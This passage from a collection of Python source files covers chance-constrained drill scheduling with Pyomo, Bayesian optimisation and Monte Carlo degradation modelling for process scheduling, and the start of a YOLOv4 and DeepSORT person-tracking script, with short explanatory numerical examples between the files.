self.m.cons.add(self.m.s[x]*sig <= 0.99)
lhs += self.m.y[x2]
rhs += k*sig/(1 - sig*self.m.s[x])
self.m.cons.add(r <= math.log(self.eps))
# self.m.cons.add(lhs == rhs)
R += mu - self.m.y[x]
self.m.cons.add(self.m.R[x] == R)
self.m.cons.add(self.m.z[x] >= self.m.y[x])
self.m.cons.add(sum([self.m.z[x] for x in self.X]) == self.m.n)
```
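The `Chance` model above pads the accumulated mean degradation by `F = Phi^{-1}(1 - eps)` times the accumulated standard deviation. A standalone numerical sketch of that padding (segment means and variances are made up):
```python
import numpy as np
import scipy.stats as sct

eps = 0.05
F = sct.norm.ppf(1 - eps)           # ~1.645

mu = np.array([0.10, 0.12, 0.08])   # mean degradation per segment
var = np.array([4e-4, 6e-4, 3e-4])  # degradation variance per segment

r = np.cumsum(mu)                   # expected degradation after each segment
pad = F * np.sqrt(np.cumsum(var))   # chance-constraint padding
R = r + pad                         # must stay <= 1 until maintenance resets it
print(np.round(R, 3))               # [0.133 0.272 0.359]
```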
#### File: johwiebe/drill-scheduling/sep.py
```python
import utils
import rogp
import numpy as np
import scipy as sp
import pyomo.environ as p
from rogp.util.numpy import _to_np_obj_array, _pyomo_to_np
class Sep():
def __init__(self, X):
m = p.ConcreteModel()
m.cons = p.ConstraintList()
m.r = p.Var(X, within=p.NonNegativeReals, bounds=(0, 1))
self.m = m
def check_feasibility(s, bb=False):
k = 0
feas = True
if bb:
check_block = check_deg_block_bb
else:
check_block = check_deg_block
for i, x in enumerate(s.Xvar):
if not isinstance(x, (float, int)):
if not check_block(s, k, i):
feas = False
break
k = i
if feas:
return check_block(s, k, len(s.X) - 1)
def check_deg_block(s, k, i):
fc = s.drillstring.pdm.failure
fc.rogp.set_tanh(False)
# Initialize parameters
alpha = 1 - (1 - s.alpha)/(len(s.Xm) + 1)
F = sp.stats.norm.ppf(alpha)
X = s.X[k:i]
Xvar = s.Xvar
delta = {s.X[j]: Xvar[j+1] - Xvar[j] for j in range(k, i)}
dp = [[s.m.rop[x].deltap()] for x in X]
dp = _to_np_obj_array(dp)
# TODO: make eps = 0.001 a parameter
dt = [[delta[x]/(s.m.rop[x].V + 0.001)] for x in X]
dt = [[x[0]()] for x in dt]
dt = _to_np_obj_array(dt)
sep = Sep(X)
r = _pyomo_to_np(sep.m.r, ind=X)
# Calculate matrices
Sig = fc.rogp.predict_cov_latent(dp).astype('float')
inv = np.linalg.inv(Sig)
hz = fc.rogp.warp(r)
mu = fc.rogp.predict_mu_latent(dp)
diff = hz - mu
obj = np.matmul(dt.T, r)[0, 0]
sep.m.Obj = p.Objective(expr=obj, sense=p.maximize)
c = np.matmul(np.matmul(diff.T, inv), diff)[0, 0]
sep.m.cons.add(c <= F)
utils.solve(sep, solver='Baron')
if obj() - 1.0 > 10e-5:
return False
return True
def get_deg_block(s, k, i):
fc = s.drillstring.pdm.failure
fc.rogp.set_tanh(False)
# Initialize parameters
alpha = 1 - (1 - s.alpha)/(len(s.Xm) + 1)
F = sp.stats.norm.ppf(alpha)
X = s.X[k:i]
Xvar = s.Xvar
delta = {s.X[j]: Xvar[j+1] - Xvar[j] for j in range(k, i)}
dp = [[s.m.rop[x].deltap()] for x in X]
dp = _to_np_obj_array(dp)
# TODO: make eps = 0.001 a parameter
dt = [[delta[x]/(s.m.rop[x].V + 0.001)] for x in X]
dt = [[x[0]()] for x in dt]
dt = _to_np_obj_array(dt)
# Calculate matrices
cov = fc.rogp.predict_cov_latent(dp).astype('float')*F
mu = fc.rogp.predict_mu_latent(dp).astype('float')
c = dt.astype('float')
return mu, cov, c.flatten()
def check_deg_block_bb(s, k, i):
print(k, i)
mu, cov, c = get_deg_block(s, k, i)
warping = s.drillstring.pdm.failure.rogp
bb = rogp.util.sep.BoxTree(mu, cov, warping, c)
lb, ub, node, n_iter, tt = bb.solve(max_iter=1000000, eps=0.001)
if ub - 1 <= 0.001:
return True
else:
return False
def get_extrema(s, k, i):
fc = s.drillstring.pdm.failure
mu, cov, c = get_deg_block(s, k, i)
inv = np.linalg.inv(cov)
rad = np.sqrt(np.diag(cov)[:, None])
X = s.X[k:i]
sep = Sep(X)
m = sep.m
xub = fc.rogp.warp_inv(mu + rad)
xlb = fc.rogp.warp_inv(mu - rad)
r = _pyomo_to_np(m.r, ind=X)
hz = fc.rogp.warp(r)
diff = hz - mu
c = np.matmul(np.matmul(diff.T, inv), diff)[0, 0]
obj = (c - 1)**2
m.Obj = p.Objective(expr=obj, sense=p.minimize)
extrema = []
for i in range(mu.shape[0]):
m.r[X[i]].value = xlb[i]
m.r[X[i]].fixed = True
utils.solve(sep, solver='Baron')
r = _pyomo_to_np(m.r, ind=X, evaluate=True)
hz = fc.rogp.warp(r)
extrema.append(hz)
m.r[X[i]].fixed = False
return extrema
``` |
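At its core, `check_deg_block` asks whether any degradation-rate vector inside the ellipsoid `(h(r) - mu)' * inv(Sigma) * (h(r) - mu) <= F` can push the accumulated damage `dt' * r` above 1. A plain-numpy sketch of evaluating the ellipsoid membership and the damage for one candidate `r` (all numbers are placeholders, and an identity warping is assumed instead of the warped GP):
```python
import numpy as np
from scipy.stats import norm

F = norm.ppf(0.95)                     # block confidence level

dt = np.array([2.0, 3.0, 1.5])         # time spent in each segment
mu = np.array([0.05, 0.08, 0.06])      # predicted mean degradation rates
Sig = np.diag([1e-4, 2e-4, 1.5e-4])    # predicted latent covariance

r = np.array([0.055, 0.085, 0.065])    # candidate degradation rates
diff = r - mu
inside = diff @ np.linalg.inv(Sig) @ diff <= F
damage = dt @ r
print(bool(inside), round(float(damage), 4))   # True 0.4625: this point is feasible
```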
{
"source": "johwiebe/stn",
"score": 3
} |
#### File: johwiebe/stn/bo.py
```python
import yaml
import dill
import functools
import argparse
import pandas as pd
import stn.deg as deg # noqa
from stn import stnModel, stnModelRobust # noqa
from skopt import gp_minimize
from sklearn.preprocessing import MinMaxScaler
def target(y, scaler, x):
"""
Target function for Bayesian Optimization
y: config dictionary (.yaml)
scaler: scaler to normalize data
x: alpha for which to evaluate
"""
q = x[0]
TIMEp = range(0, y["Tp"], y["dTp"])
# Load stn structure
with open(y["stn"], "rb") as dill_file:
stn = dill.load(dill_file)
# Initialize model
if y["robust"]:
model = stnModelRobust(stn)
else:
model = stnModel(stn)
# Add demands
for i, t in enumerate(TIMEp):
for p in stn.products:
model.demand(p, t, y[p][i])
# Solve model
model.solve([y["Ts"], y["dTs"], y["Tp"], y["dTp"]],
solver="cplex",
objective="terminal",
periods=1,
prefix=y["prfx"],
rdir=y["rdir"],
save=True,
alpha=q,
trace=True,
solverparams=y["solverparams"],
tindexed=False)
# Evaluate overall cost
df = model.eval(periods=y["periods"], TP=y["TP"])
obj = df["Cost"]
for j in stn.units:
obj += df[j]/100*y["ccm"][j]
# Return scaled cost
return scaler.transform([[float(obj)]])[0][0]
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("file", help=".yaml file with run parameters")
parser.add_argument("prefix", help="prefix for file names")
args = parser.parse_args()
# Load config file
with open(args.file, "r") as f:
y = yaml.load(f, Loader=yaml.FullLoader)
y["prfx"] = args.prefix + y["prfx"]
# Initialize Scaler
scaler = MinMaxScaler()
scaler.fit([[0], [1]])
# Single variable target function
wrap = functools.partial(target, y, scaler)
# Get initial points and scale
x_init = [[0.02], [0.17], [0.34], [0.5]]
y_init = [[wrap(x)] for x in x_init]
scaler.fit(y_init)
y_init = [yi[0] for yi in scaler.transform(y_init)]
# Maximum number of iterations
N = 34
# Bayesian Optimization
bo = gp_minimize(wrap, [(0.02, 0.5)], x0=x_init, y0=y_init,
acq_func="EI", n_calls=N, verbose=True,
n_random_starts=0, noise="gaussian", n_jobs=-1)
# Unscale and save results
bo_x = [x[0] for x in bo.x_iters]
bo_y = scaler.inverse_transform(bo.func_vals.reshape(-1, 1))
bo_y = [yi[0] for yi in bo_y]
df = pd.DataFrame([list(i) for i in zip(bo_x, bo_y)],
columns=["alpha", "cost"])
df.to_pickle(y["rdir"] + "/" + y["prfx"] + "obj.pkl")
df.to_csv(y["rdir"] + "/" + y["prfx"] + "obj.csv")
with open(y["rdir"] + "/" + y["prfx"] + "bo.pkl", "wb") as f:
dill.dump(bo, f)
```
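The script above wires `gp_minimize` to an expensive scheduling run; the call pattern itself is easier to see on a toy objective. A minimal, self-contained sketch with the same warm-start (`x0`/`y0`) and acquisition settings:
```python
from skopt import gp_minimize

def toy_objective(x):
    # stands in for the scaled scheduling cost; minimum near alpha = 0.3
    return (x[0] - 0.3) ** 2

x_init = [[0.02], [0.17], [0.34], [0.5]]
y_init = [toy_objective(x) for x in x_init]

res = gp_minimize(toy_objective, [(0.02, 0.5)],
                  x0=x_init, y0=y_init,
                  acq_func="EI", n_calls=15,
                  n_random_starts=0, noise=1e-10)
print(res.x, res.fun)   # best alpha found and its objective value
```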
#### File: stn/stn/deg.py
```python
import numpy as np
import pandas as pd
import time
import dill
from joblib import Parallel, delayed
import scipy.stats as sct
from math import floor
import collections
class degradationModel(object):
"""
Degradation model for an STN unit.
unit: name of unit
dist: type of distribution
"""
def __init__(self, unit, dist="normal"):
valid_dists = ["normal"]
assert dist in valid_dists, "Not a valid distribution: %s" % dist
self.dist = dist
self.unit = unit
# dictionaries indexed by k
self.mu = {}
self.sd = {}
def set_op_mode(self, k, mu, sd):
self.mu[k] = mu
self.sd[k] = sd
def get_quantile(self, alpha, k, dt=1):
if self.dist == "normal":
mu = self.mu[k]*dt
sd = self.sd[k]*np.sqrt(dt)
return sct.norm.ppf(q=alpha, loc=mu, scale=sd)
def get_mu(self, k, dt=1):
return self.mu[k]*dt
def get_sd(self, k, dt=1):
return self.sd[k]*np.sqrt(dt)
def get_dist(self, k, dt=1):
mu = self.mu[k]*dt
sd = self.sd[k]*np.sqrt(dt)
return mu, sd
def get_eps(self, alpha, k, dt=1):
mu = self.get_mu(k, dt=dt)
eps = 1 - self.get_quantile(alpha, k, dt=dt)/mu
return eps
def calc_p_fail(model, j, alpha, TPfile, Nmc=100, N=1000, dt=3,
periods=0, pb=True, dTs=None, freq=False, knn=None, *args, **kwargs):
"""
Calculate probability of unit failure
model: solved stn model
j: unit
alpha: uncertainty set size parameter
TPfile: file with logistic regression model for markov chain
Nmc: number of sequences generated from markov chain
N: Number of Monte-Carlo evaluations for each sequence
dt: time step for naive approach
periods: number of planning periods to evaluate (all if periods=0)
pb: if set to True, approach by Poetzelberger is used (Wiener process)
"""
Ncpus = 8 # number of CPUs to used for parallel execution
# make data global for parallel execution
global stn, table
stn = model.stn
# get schedules from model scheduling horizon
if "get_unit_profile" in dir(model):
df = model.get_unit_profile(j, full=False)
df["taskmode"] = df["task"] + "-" + df["mode"]
mc0 = list(df["taskmode"])
t0 = list(df["time"])[1:]
# length of final task in scheduling horizon
i = df.tail(1)["task"].iloc[0]
if i == "None":
t0.append(t0[-1] + model.sb.dT)
elif i == "M":
t0.append(t0[-1] + stn.tau[j])
else:
k = df.tail(1)["mode"].iloc[0]
t0.append(t0[-1] + stn.p[i, j, k])
Sinit = model.model.sb.R[j, model.sb.T - model.sb.dT]()
dTp = model.pb.dT
dTs = model.sb.dT
else:
assert dTs is not None
mc0 = ["None-None"]
t0 = [dTs]
Sinit = stn.Rinit[j]
dTp = model.dT
# load logistic regression model
with open(TPfile, "rb") as dill_file:
TP = dill.load(dill_file)
# get production targets for planning horizon
pdf = model.get_production_targets()
if periods > 0:
pdf = pdf[(pdf["time"] <= periods*dTp) & (pdf["time"]
> t0[-1])]
else:
pdf = pdf[(pdf["time"] > t0[-1])]
prods = stn.products
dem = []
for p in prods:
dem.append(np.array(pdf[p]))
# generate Nmc sequences from Markov chain
st = time.time()
mclist = []
mcslist = []
tlist = []
tslist = []
if not freq:
D = {"None-None": 0, "M-M": 0}
# calculate all relevant transition probabilities once
table = {}
for i in stn.I[j]:
for k in stn.O[j]:
tm = i + "-" + k
ptm = stn.p[i, j, k]
# Dtm = stn.D[i, j, k]
# eps = 1 - stn.deg[j].get_quantile(alpha, tm, ptm)/Dtm
Dtm = stn.deg[j].get_mu(tm, ptm)
eps = stn.deg[j].get_eps(alpha, tm, ptm)
D.update({tm: Dtm*(1+eps)})
if knn is None:
for tm in D.keys():
logreg = TP[j, tm]
for period, d in enumerate(dem[0]):
if type(logreg) == str:
table[tm, period] = pd.DataFrame([1], columns=[logreg])
else:
prob = logreg.predict_proba([[d[period] for d in dem]])
table[tm, period] = np.cumsum(pd.DataFrame(prob,
columns=logreg.classes_),
axis=1)
else:
table = get_knn_TP(knn[0], dem, knn[1], j)
# generate sequences in parallel
res = Parallel(n_jobs=Ncpus)(delayed(generate_seq_mc)(D,
j, "None-None",
t0[-1],
dTs, dTp,
dem,
# eps,
Sinit=Sinit)
for i in range(0, Nmc))
else:
res = gen_seqs(Nmc, dem, j, alpha, TPfile, stn, dTs, dTp)
# append generated sequences to scheduling horizon
# occ = []
for n in range(0, Nmc):
mc = mc0 + res[n][0]
# occ.append(sum(np.array(mc) == "Separation-Slow"))
t = t0 + res[n][1]
mcshort, tshort = get_short_mc(mc, t)
mclist.append(mc)
tlist.append(t)
mcslist.append(mcshort)
tslist.append(tshort)
# estimate failure probabilities in parallel
Smax = model.stn.Rmax[j]
Sinit = model.stn.Rinit0[j]
# approach by Poetzelberger
if pb:
GL, LL = get_gradient(stn, j)
inflist = Parallel(n_jobs=Ncpus)(delayed(sim_wiener_pb)(mcslist[i],
tslist[i],
GL, LL,
Nmcs=N,
Smax=Smax,
Sinit=Sinit,
*args,
**kwargs)
for i in range(0, len(mcslist)))
inflist = np.array(inflist)*100
# naive approach
else:
Darrlist = []
for n in range(0, Nmc):
Darrlist.append(get_deg_profile(mclist[n], stn, j, model.sb.dT, dt,
Sinit=Sinit))
inflist = Parallel(n_jobs=Ncpus)(delayed(sim_wiener_naive)(Darr, j,
N=N,
Rmax=Smax,
Sinit=Sinit,
*args,
**kwargs)
for Darr in Darrlist)
inflist = np.array(inflist)/N*100
print("Time taken:" + str(time.time()-st) + ", Pfail:" + str(max(inflist)))
return inflist
def generate_seq_mc(D, j, s0, t0, dTs, dTp, demand, Sinit=0):
"""Generate sequence of operating modes from Marov chain."""
np.random.seed()
mc = []
s = s0
Smax = stn.Rmax[j]
S = Sinit
Slist = []
t = t0
# time taken by s0
if s == "None-None":
t += dTs
elif s == "M-M":
t += stn.tau[j]
else:
i, k = s.split("-")
t += stn.p[i, j, k]
tlist = []
# add operating modes to while t < T
while t < (t0 // dTp + len(demand[0]))*dTp:
mc.append(s)
Slist.append(S)
tlist.append(t)
# TODO: this should not be necessary, MC should not contain maintenance
while True:
# draw random new state from transition probabilities
s_ind = np.where(np.random.uniform()
< (table[s, t // dTp - t0 // dTp]))[1][0]
s = table[s, t // dTp - t0 // dTp].columns[s_ind]
if s != "M-M":
break
S = S + D[s]
# insert maintenance if needed
if S > Smax:
s = "M-M"
S = 0
if s == "None-None":
t += dTs
elif s == "M-M":
t += stn.tau[j]
else:
i, k = s.split("-")
t += stn.p[i, j, k]
return mc, tlist
def sim_wiener_naive(Darr, j, N=1, Sinit=0, S0=0,
Rmax=0, plot=False):
"""Calculate probability of failure with naive approach."""
np.random.seed()
Ns = Darr.shape[1]
Ninf = 0
S = np.ones(N)*Sinit
for s in range(0, Ns):
if Darr[2, s] < 0.5:
dS = np.random.normal(loc=Darr[0, s], scale=Darr[1, s], size=N)
S = S + dS
else:
S = np.ones(N)*S0
Ninf += sum(S >= Rmax)
S = S[S < Rmax]
N = S.size
return Ninf
def sim_wiener_pb(mc, t, GL, LL, Nmcs=1000, Sinit=0, S0=0, Smax=0):
"""Calcualte probabillity of failure with approach by Poetzelberger."""
J = 1
# split sequence at maintenance tasks
for mcg, tg in gen_group(mc, t, "M-M"):
if len(mcg) > 0:
J *= 1 - sim_wiener_group(mcg, tg, GL, LL, Nmcs, Sinit=Sinit,
Smax=Smax)
Sinit = S0
return 1 - J
def sim_wiener_group(mc, t, GL, LL, Nmcs=1000, Sinit=0, Smax=0):
"""
Calculate probability of failure between two maintenance tasks
(approach by Poetzelberger).
"""
np.random.seed()
Dm = [GL[tm] for tm in mc]
Dsd = [LL[tm] for tm in mc]
tdiff = [t[0]]
tdiff += [t - s for s, t in zip(t, t[1:])]
c = (Smax - Sinit - np.cumsum(np.multiply(tdiff, Dm)))
c = np.insert(c, 0, Smax - Sinit)
N = len(tdiff)
Dsqrt = np.diag(np.sqrt(tdiff))
M = np.tril(np.ones((N, N), dtype=int), 0)
hl = []
for n in range(0, Nmcs):
u = np.random.normal(scale=np.sqrt(Dsd))
A = np.matmul(np.matmul(M, Dsqrt), u)
xp = c[1:] + A
xm = np.insert(xp, 0, c[0])[:-1]
ind = [xi > 0 for xi in xp]
h = 1
for i in range(0, N):
if ind[i]:
h *= (1 - np.exp(-2*xm[i]*xp[i]/(Dsd[i]*tdiff[i])))
else:
h = 0
hl.append(h)
return 1 - np.mean(hl)
def gen_group(mc, t, sep):
"""
Generator for sequences of operating modes between maintenance
tasks.
"""
mcg = []
tg = []
for i, el in enumerate(mc):
if el == sep:
yield mcg, tg
mcg = []
tg = []
mcg.append(el)
tg.append(t[i])
yield mcg, tg
def get_short_mc(mc, t):
slast = mc[0]
mcshort = [mc[0]]
tshort = []
for i, s in enumerate(mc):
if s != slast:
mcshort.append(s)
tshort.append(t[i-1])
slast = s
tshort.append(t[-1])
return mcshort, tshort
def get_gradient(stn, j):
"""Calculate mue, sd for each task/mode combination."""
GL = {}
LL = {}
for i in stn.I[j]:
for k in stn.O[j]:
taskmode = i + "-" + k
GL[taskmode] = stn.deg[j].get_mu(taskmode)
LL[taskmode] = (stn.deg[j].get_sd(taskmode))**2
# TODO: move default values for mu, sd to stn
GL["None-None"] = 0
LL["None-None"] = 0.05**2
GL["M-M"] = 0
LL["M-M"] = 0.05**2
return GL, LL
def get_deg_profile(profile, stn, j, dT, dt=1/10, N=1, Sinit=0, S0=0):
"""Get profile of D, sd, and Mt (for naive approach)."""
Darr = np.zeros((3, 0))
t = 0
for taskmode in profile:
m = 0
# TODO: move default values for mue, sd to stn
mue = 0
sd = 0.05*np.sqrt(dt)
if taskmode == "None-None":
tend = t + dT
elif taskmode == "M-M":
tend = t + stn.tau[j]
sd = 0
m = 1
else:
s = taskmode.split("-")
i = s[0]
k = s[1]
tend = t + stn.p[i, j, k]
mue, sd = stn.deg[j].get_dist(i + "-" + k, dt)
tend = int(tend)
Darr = np.concatenate((Darr,
np.array([
[mue for i
in range(int(t/dt),
int(tend/dt))],
[sd for i
in range(int(t/dt),
int(tend/dt))],
[m]+[0 for i
in range(int(t/dt)+1,
int(tend/dt))]])),
axis=1)
t = tend
return Darr
def check_feasibility_lambda(lam, N, delta):
lhs = 1/(N+1)*floor((N+1)/N*((N-1)/lam**2 + 1))
if lhs <= delta:
return lam
else:
return 10000000
def calc_p_fail_dem(dem, stn_file, j, alpha, TP=None, TPfile=None,
Nmc=100, N=1000, dt=3,
periods=0, pb=True, dTs=0, dTp=0, *args, **kwargs):
"""
"""
assert TP is not None or TPfile is not None
Ncpus = 8 # number of CPUs to used for parallel execution
# make data global for parallel execution
global stn, table
with open(stn_file, "rb") as dill_file:
stn = dill.load(dill_file)
if periods > 0:
dem = [d[0:periods] for d in dem]
# get schedules from model scheduling horizon
mc0 = ["None-None"]
t0 = [dTs]
Sinit = stn.Rinit[j]
# TP = TPfile
if TPfile is not None:
with open(TPfile, "rb") as f:
TP = dill.load(f)
# get production targets for planning horizon
# generate Nmc sequences from Markov chain
D = {"None-None": 0, "M-M": 0}
# calculate all relevant transition probabilities once
table = {}
for i in stn.I[j]:
for k in stn.O[j]:
tm = i + "-" + k
ptm = stn.p[i, j, k]
Dtm = stn.deg[j].get_mu(tm, ptm)
eps = stn.deg[j].get_eps(alpha, tm, ptm)
D.update({tm: Dtm*(1+eps)})
for tm in D.keys():
logreg = TP[j, tm]
for period, d in enumerate(dem[0]):
if type(logreg) == str:
table[tm, period] = pd.DataFrame([1], columns=[logreg])
else:
prob = logreg.predict_proba([[d[period] for d in dem]])
table[tm, period] = np.cumsum(pd.DataFrame(prob,
columns=logreg.classes_), axis=1)
# generate sequences in parallel
res = Parallel(n_jobs=Ncpus)(delayed(generate_seq_mc)(D,
j, "None-None",
t0[-1],
dTs, dTp,
dem,
# eps,
Sinit=Sinit)
for i in range(0, Nmc))
# append generated sequences to scheduling horizon
tms = D.keys()
hist = {tm: [0] for tm in tms}
hist_min = {tm: [float('inf')] for tm in tms}
hist_max = {tm: [0] for tm in tms}
for n in range(0, Nmc):
mc = mc0 + res[n][0]
c = collections.Counter(mc)
for k in c:
hist[k][0] += c[k]/Nmc
hist_min[k][0] = min(hist_min[k][0], c[k])
hist_max[k][0] = max(hist_max[k][0], c[k])
df = pd.DataFrame.from_dict(hist)
# df["type"] = "mean"
# df2 = pd.DataFrame.from_dict(hist_min)
# df2["type"] = "min"
# df = df.append(df2)
# df2 = pd.DataFrame.from_dict(hist_max)
# df2["type"] = "max"
# df = df.append(df2)
return df
def score(TP, df, prods, stn, stn_file, alpha, dTs, dTp):
scr = 0
print("Calc score")
df["taskmode"] = df["task"] + "-" + df["mode"]
for j in stn.units:
dfj = df[df["unit"] == j].copy()
dfj = dfj.reset_index()
for rid in np.unique(dfj["id"]):
dfrid = dfj[dfj["id"] == rid]
dem = [[d] for d in dfrid.loc[dfrid.index[0], prods].tolist()]
hist_pred = calc_p_fail_dem(dem, stn_file, j, alpha, TP=TP,
dTs=dTs, dTp=dTp)
c = collections.Counter(dfj.loc[dfj["id"] == rid, "taskmode"])
hist_true = {tm: c[tm] for tm in hist_pred}
scr += sum(np.array([(hist_true[tm] - hist_pred[tm])**2 for tm in
hist_true]))
print(scr)
return scr
class Seq(object):
def __init__(self, tm=[], t=[]):
self.tm = tm
self.t = t
def __iadd__(self, other):
self.tm += other.tm
self.t += other.t
return self
def __add__(self, other):
return Seq(self.tm + other.tm, self.t + other.t)
def __repr__(self):
return 'Seq(%r, %r)' % (self.tm, self.t)
def __len__(self):
return len(self.t)
def pop(self):
return self.tm.pop(), self.t.pop()
class seqGen(object):
def __init__(self, TPfile, stn, dTs, dTp):
self.stn = stn
self.dTs = dTs
self.dTp = dTp
def gen_seqs(N, dem, j, alpha, TPfile, stn0, dTs, dTp, Sinit=None):
Ncpus = 8
global table, D, stn
with open(TPfile, "rb") as f:
TP = dill.load(f)
stn = stn0
if Sinit is None:
Sinit = stn.Rinit[j]
table = {}
tms = set(i + "-" + k for i in stn.I[j] for k in stn.O[j])
for tm in tms:
logreg = TP[j, tm]
for period, d in enumerate(dem[0]):
if logreg is None:
table[tm, period] = pd.DataFrame([1], columns=['0'])
else:
prob = logreg.predict_proba([[d[period] for d in dem]])
table[tm, period] = pd.DataFrame(prob,
columns=logreg.classes_)
D = {"None-None": 0, "M-M": 0}
# calculate all relavent transition probabilities once
for i in stn.I[j]:
for k in stn.O[j]:
tm = i + "-" + k
ptm = stn.p[i, j, k]
Dtm = stn.deg[j].get_mu(tm, ptm)
eps = stn.deg[j].get_eps(alpha, tm, ptm)
D.update({tm: Dtm*(1+eps)})
gen_seq(dem, j, alpha, Sinit, dTp, dTs)
res = Parallel(n_jobs=Ncpus)(delayed(gen_seq)(dem, j, alpha,
Sinit, dTp,
dTs)
for i in range(0, N))
return [[i.tm, i.t] for i in res]
def gen_seq(dem, j, alpha, Sinit, dTp, dTs):
seq = Seq()
tms = set(i + "-" + k for i in stn.I[j] for k in stn.O[j])
for p, d in enumerate(dem[0]):
tmseq = [np.random.choice(table[tm, p].columns.values,
p=table[tm, p].iloc[0, :].values)
for tm in tms]
tmseq = list(map(int, map(float, tmseq)))
tmseq = [tm for i, tm in enumerate(tms) for j in
range(0, tmseq[i])]
tmseq_split = [tuple(tm.split('-')) for tm in tmseq]
dtseq = [stn.p[i, j, k] for i, k in tmseq_split]
if sum(dtseq) > dTp:
c = list(zip(tmseq, dtseq))
np.random.shuffle(c)
tmseq, dtseq = [i for i in map(list, zip(*c))]
while sum(dtseq) > dTp:
tmseq.pop()
dtseq.pop()
Nnn = (dTp - sum(dtseq)) // dTs
tmseq += ["None-None"] * Nnn
dtseq += [dTs] * Nnn
c = list(zip(tmseq, dtseq))
np.random.shuffle(c)
tmseq, dtseq = [i for i in map(list, zip(*c))]
seq += Seq(tmseq, dtseq)
seq = __insert_maint(seq, j, alpha, Sinit, dTp*len(dem[0]))
return seq
def __insert_maint(seq, j, alpha, Sinit, Tp):
tmseq = []
tseq = [0]
s = Sinit
while (len(seq) > 0) and (tseq[-1] < Tp):
tm, dt = seq.pop()
s += D[tm]
if s > stn.Rmax[j]:
tmseq += ["M-M"]
tseq += [tseq[-1] + stn.tau[j]]
s = D[tm]
tmseq += [tm]
tseq += [tseq[-1] + dt]
return Seq(tmseq, tseq[1:])
def get_knn_TP(proffile, dem, k, j):
with open(proffile, "rb") as f:
prof = dill.load(f)
dfj = prof[prof["unit"] == j].copy()
dfj = dfj.reset_index(drop=True)
res = dfj[stn.products + ["id"]].drop_duplicates()
dem = [list(d) for d in zip(*dem)]
for p, d in enumerate(dem):
for i in stn.I[j]:
for k in stn.O[k]:
tm = i + "-" + k
dis = sum([(res[p] - d[i])**2 for i, p in
enumerate(stn.products)])
knn = tuple(res.loc[dis.nsmallest(k).index, "id"])
df = dfj[dfj["id"].isin(knn)]
table[tm, p] = np.cumsum(get_trans_prob(df, tm, j))
def get_trans_prob(df, tm, j):
df["taskmode-1"] = df["taskmode"].shift(-1)
df.loc[pd.isna(df["taskmode"]), "taskmode-1"] = "None-None"
if np.any(df["taskmode"] == tm):
table = get_hist(df[df["taskmode"] == tm], "taskmode-1")
else:
table = get_hist(df[df["taskmode"] == "None-None"], "taskmode-1")
return table
def get_hist(df, col):
table = pd.DataFrame.from_dict(collections.Counter(df[col]),
orient="index")
table = table.rename(columns={0: "count"})
table["p"] = table["count"]/sum(table["count"])
return table
if __name__ == '__main__':
with open('../data/p2.dat', 'rb') as f:
stn = dill.load(f)
seqgen = seqGen('../data/p2freq.pkl', stn, 3, 168)
k = gen_seqs(10, [[2250, 750, 1250, 1750, 2000, 2000, 2000, 2000,
2000]], 'U2', 0.5, '../data/p2freq.pkl', stn, 3, 168)
import ipdb; ipdb.set_trace() # noqa
``` |
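A short usage sketch of `degradationModel` on its own: one operating mode with a per-unit-time mean and standard deviation, queried for a task of duration 3 (all numbers are placeholders).
```python
from stn.deg import degradationModel

dm = degradationModel('U1')                        # unit name is arbitrary here
dm.set_op_mode('Heating-Slow', mu=0.05, sd=0.01)   # degradation rate per unit time

dt = 3                                             # task duration
print(round(dm.get_mu('Heating-Slow', dt=dt), 4))              # 0.15
print(round(dm.get_sd('Heating-Slow', dt=dt), 4))              # 0.0173 (sd * sqrt(dt))
print(round(dm.get_quantile(0.95, 'Heating-Slow', dt=dt), 4))  # 0.1785
```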
{
"source": "Johyeonje/TrackPerformerAlgorism",
"score": 2
} |
#### File: Johyeonje/TrackPerformerAlgorism/object_tracker_cus1.py
```python
import os
# comment out below line to enable tensorflow logging outputs
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import time
import tensorflow as tf
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices) > 0:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
from absl import app, flags, logging
from absl.flags import FLAGS
import core.utils as utils
from core.yolov4 import filter_boxes
from tensorflow.python.saved_model import tag_constants
from core.config import cfg
from PIL import Image
import cv2
import numpy as np
import matplotlib.pyplot as plt
# from tensorflow.compat.v1 import ConfigProto
# from tensorflow.compat.v1 import InteractiveSession
# deep sort imports
from deep_sort import preprocessing, nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from tools import generate_detections as gdet
import queue
class Apply_Models(object):
def __init__(self):
# Definition of the parameters
max_cosine_distance = 0.4
nn_budget = None
model_filename = 'model_data/mars-small128.pb'
weights = './checkpoints/yolov4-416'
# create indexing queue
self.indexing = queue.Queue()
# initialize deep sort
self.encoder = gdet.create_box_encoder(model_filename, batch_size=1)
# Set Tracker
self.metric = nn_matching.NearestNeighborDistanceMetric("cosine", max_cosine_distance, nn_budget)
self.tracker = Tracker(self.metric)
# Load Model
self.saved_model_loaded = tf.saved_model.load(weights, tags=[tag_constants.SERVING])
self.infer = self.saved_model_loaded.signatures['serving_default']
def main(self, frame_data):
# Definition of the parameters
nms_max_overlap = 1.0
# set HyperParams
size = 416
iou = 0.45
score = 0.50
info = False
people_num = 4
input_size = size
self.indexing.queue.clear()
for k in range(people_num):
self.indexing.put(k+1)
out = None
frame_data = cv2.cvtColor(frame_data, cv2.COLOR_BGR2RGB)
image_data = cv2.resize(frame_data, (input_size, input_size))
image_data = image_data / 255.
image_data = image_data[np.newaxis, ...].astype(np.float32)
start_time = time.time()
batch_data = tf.constant(image_data)
pred_bbox = self.infer(batch_data) # run the frame through the YOLO model to get bounding-box predictions
for key, value in pred_bbox.items():
boxes = value[:, :, 0:4] # box coordinates
pred_conf = value[:, :, 4:] # confidence / class score vector
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),
scores=tf.reshape(
pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),
max_output_size_per_class=50,
max_total_size=50,
iou_threshold=iou,
score_threshold=score
)
# convert data to numpy arrays and slice out unused elements
num_objects = valid_detections.numpy()[0]
bboxes = boxes.numpy()[0]
bboxes = bboxes[0:int(num_objects)]
scores = scores.numpy()[0]
scores = scores[0:int(num_objects)]
classes = classes.numpy()[0]
classes = classes[0:int(num_objects)]
# format bounding boxes from normalized ymin, xmin, ymax, xmax ---> xmin, ymin, width, height
original_h, original_w, _ = frame_data.shape
